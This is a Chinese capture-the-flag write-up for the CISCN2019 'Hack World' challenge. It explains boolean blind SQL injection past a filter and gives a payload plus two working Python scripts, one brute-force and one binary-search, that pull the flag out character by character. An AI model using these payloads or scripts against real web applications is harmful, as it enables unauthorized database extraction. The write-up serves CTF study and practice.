来源:[CISCN2019 华北赛区 Day2 Web1]
链接:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World
参考:https://ca01h.top/Web_security/ctf_writeup/7.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5/#CISCN2019-Hack-world
考察:bool盲注
看到payload想骂脏话
尝试常规输入,1和2可以,之后都不行
尝试常规的注入,只有单引号时会返回bool(false),应该提示bool型盲注吧
payload为
if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)
由于1和2输出不同,根据这个进行注入即可
可以通过一个字典,观察哪些字符被waf过滤
脚本
import requests
url="http://a9e8a73f-f3d4-4ee4-a165-78c21730f40d.node3.buuoj.cn/index.php"
text1 = "Hello, glzjin wants a girlfriend."
text2 = "Do you want to be my girlfriend?"
ans = ""
for i in range(60):
# print("debug")
flag = False
for j in range(0,256):
c = chr(j)
# print(c)
s = "if(ascii(substr((select(flag)from(flag)),{},1))={},1,2)".format(i+1, j) #注意此处必须转成ascii码判断,因为sql中不区分大小写,直接判断字符会有双引号单引号大小写等问题
post_data = {
"id": s
}
# print(s)
response = requests.post(url, post_data)
if text1 in response.text:
flag = True
ans += c
print(c)
break
if flag == False:
break
print(ans)
# if(substr(select(flag)from(flag),{},1)={},1,2)
这个脚本比较慢,提高效率的方法有两个。一个是转换成ascii码查找(本题过滤了ord,因此只能用ascii进行转码),一个是range下限设置为32('a’从32开始)
wp提供了一个二分脚本
import requests
url = 'http://a9475c38-821c-4b23-aa96-87730f0863fe.node3.buuoj.cn/index.php'
flag = 'Hello, glzjin wants a girlfriend.'
result = ''
for i in range(1, 50):
sleep(1)
high = 127
low = 32
mid = (high + low) // 2
while high > low:
payload = "if(ascii(substr((select(flag)from(flag)),{index},1))>{char},1,2)".format(index=i, char=mid)
data = {'id': payload}
response = requests.post(url=url, data=data)
if flag in response.text:
low = mid + 1
else:
high = mid
mid = (high + low) // 2
result += chr(mid)
print(result)